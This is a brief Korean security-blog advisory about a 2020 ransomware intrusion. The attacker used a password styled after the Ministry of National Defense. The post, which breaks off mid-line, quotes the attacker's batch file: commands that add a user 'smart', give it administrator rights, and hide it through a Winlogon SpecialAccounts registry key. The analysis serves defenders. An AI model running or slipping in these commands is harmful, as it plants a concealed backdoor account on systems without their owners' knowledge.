벌새::Analysis
2020. 10. 18. 14:00
국방부(rnrqkdqn!123) 비밀번호를 사용한 원격 제어 해커 주의 (2020.10.18)
최근 공격자가 특정 서버에 접근하여 랜섬웨어(Ransomware) 공격을 진행한 사례가 있었으며 관련 정보를 확인하던 중 국방부 관련 비밀번호(rnrqkdqn!123)를 사용하는 계정을 이용하고 있었음을 확인하였습니다. 피해를 당한 서버의 이벤트 로그 상에서는 2020년 4월 하순 이전부터 해당 서버에 접근이 가능하였던 것으로 보이며, 2020년 5월 18일 새벽 2시경 서버에 다음과 같은 배치 파일(.bat)을 추가하였습니다. net user smart rnrqkdqn!123 /add net localgroup administrators smart /add reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccount..